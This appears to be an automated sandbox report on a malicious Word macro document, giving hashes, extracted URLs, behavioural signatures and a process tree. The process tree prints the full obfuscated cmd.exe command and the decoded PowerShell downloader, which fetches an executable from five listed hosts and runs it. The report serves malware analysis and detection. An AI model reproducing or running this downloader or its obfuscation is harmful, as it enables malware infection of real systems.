Analysis
-
max time kernel
112s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
01-05-2024 20:55
Behavioral task
behavioral1
Sample
0cd2dc8f5077f4bbf3b937793970fa25_JaffaCakes118.doc
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
0cd2dc8f5077f4bbf3b937793970fa25_JaffaCakes118.doc
Resource
win10v2004-20240226-en
General
-
Target
0cd2dc8f5077f4bbf3b937793970fa25_JaffaCakes118.doc
-
Size
76KB
-
MD5
0cd2dc8f5077f4bbf3b937793970fa25
-
SHA1
cd23e7cf92c31d0d61b717e3aa520f696e3a031d
-
SHA256
0ee992c47ce36bb0ec5f69e73c1503daac08270193ffa3a8bfbcd9efccd903c5
-
SHA512
cca2600b1dcc91903695d49d8914581604e15c18e043dbd95a3573593cae8412aa41fdb5d7e739f0de73d1cd3e59b80e8bdc0f6f0a158bb2786199d185212586
-
SSDEEP
1536:zptJlmrJpmxlRw99NBF+a//zUmUmUlo/gGbc2+:9te2dw99fluNQc
Malware Config
Extracted
http://bigsenindonesia.com/kYQ9UR0
http://hotelnoraipro.com/iw0
http://4theweb.co.uk/wwvvv/w3b
http://andrewmiller.com.au/YJ7ro
http://91.151.190.122/osticket/C1A9
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4076 1836 cmd.exe 89 -
Blocklisted process makes network request 6 IoCs
flow pid Process 34 4140 powershell.exe 43 4140 powershell.exe 46 4140 powershell.exe 48 4140 powershell.exe 54 4140 powershell.exe 60 4140 powershell.exe -
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
pid Process 4076 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1836 WINWORD.EXE 1836 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4140 powershell.exe 4140 powershell.exe 4140 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4140 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1836 WINWORD.EXE 1836 WINWORD.EXE 1836 WINWORD.EXE 1836 WINWORD.EXE 1836 WINWORD.EXE 1836 WINWORD.EXE 1836 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1836 wrote to memory of 4076 1836 WINWORD.EXE 95 PID 1836 wrote to memory of 4076 1836 WINWORD.EXE 95 PID 4076 wrote to memory of 4140 4076 cmd.exe 101 PID 4076 wrote to memory of 4140 4076 cmd.exe 101
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0cd2dc8f5077f4bbf3b937793970fa25_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\SYSTEM32\cmd.execmd /V^:^O/C"s^e^t rn=^ ^ ^ ^ ^ ^ ^ }}^{^hctac}^;k^a^erb;Mp^L$ m^et^I^-ek^ovnI;)M^p^L$^ ^,WhX$(eliFd^a^olnwo^D^.qnv${yrt^{)V^W^W^$^ n^i^ ^W^h^X^$(hcaerof;'^exe^.'+^wMO$^+^'\^'^+c^i^l^b^up:vn^e^$^=^M^pL^$;^'3^9^1^' ^= w^MO$^;)'^@'(t^i^l^p^S.'^9A^1C/^tekcitso/22^1^.^0^9^1^.^151^.^19//^:pt^t^h^@^or7^J^Y/u^a^.m^oc^.rel^l^imw^er^dn^a//^:ptt^h@b^3^w/vvvww/^k^u^.^oc^.^b^ew^e^ht^4//:^p^tth^@^0w^i/^m^oc^.orpi^aronleto^h//:^p^tt^h@^0RU9^QY^k/^moc^.^ai^senodnin^esg^i^b//:pt^th'^=VWW^$;tn^e^i^lC^b^e^W^.^t^eN^ tc^e^j^b^o^-^w^en^=^qnv^$^ ^l^lehsr^ew^op&&^f^or /^L %^H ^in (37^3,^-1^,0)^d^o s^e^t ^0^3^i=!^0^3^i!!rn:~%^H,1!&&i^f %^H ^ls^s ^1 c^al^l %^0^3^i:^~-3^74%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $vnq=new-object Net.WebClient;$WWV='http://bigsenindonesia.com/kYQ9UR0@http://hotelnoraipro.com/iw0@http://4theweb.co.uk/wwvvv/w3b@http://andrewmiller.com.au/YJ7ro@http://91.151.190.122/osticket/C1A9'.Split('@');$OMw = '193';$LpM=$env:public+'\'+$OMw+'.exe';foreach($XhW in $WWV){try{$vnq.DownloadFile($XhW, $LpM);Invoke-Item $LpM;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1340 --field-trial-handle=2244,i,11878111470816612087,2265290141962607370,262144 --variations-seed-version /prefetch:81⤵PID:4712
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82